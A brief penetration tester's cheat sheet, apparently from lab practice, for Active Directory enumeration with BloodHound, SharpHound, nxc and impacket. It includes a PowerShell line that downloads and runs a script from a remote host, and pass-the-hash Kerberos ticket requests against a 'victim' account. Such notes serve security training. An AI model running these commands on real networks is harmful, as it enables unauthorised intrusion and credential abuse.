Bloodhound

PingCastle --healthcheck --server mydomain.com

docker

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain tree.corp.com

net start neo4j

bloodhound-python -v -u user -p password -ns <nameserver> -d <domain> -dc <dc> -c all,LoggedOn
#-k kerberos with ccache ; --hashes hash

nxc --verbose ldap <ip> -u user -p pass --bloodhound -ns <nameserver-ip> -d <domain> --collection All
#-k kerberos with ccache (need cifs requested) ; -H hash 
# may config /etc/krb5.conf
#need to have the vulnerable account compromised & has its hash
# impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip xx.xx
# impacket-getST -spn cifs/targethost.domain.com corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}

may need to have ldap requested in ticket if use in kali (may request in victim machine first then copy the ticket out with it included)

kvno ldap/[email protected]

use impacket

impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}

export KRB5CCNAME=victim.ccache

impacket-getST -spn ldap/dc.corp.com:1433 corp.com/victim -k -no-pass -dc-ip {}

export KRB5CCNAME=ldap.ccache

kvno ldap/[email protected]

need ldap ticket b4 collection

/etc/hosts
172.16.177.168	complyedge.com dmzdc01.complyedge.com

/etc/resolv.conf
nameserver 172.16.177.168

bloodhound-python -u pete -k  -v -c all,LoggedOn -d complyedge.com -ns 172.16.177.168 -dc dmzdc01.complyedge.com --dns-timeout 500 --disable-pooling --dns-tcp --zip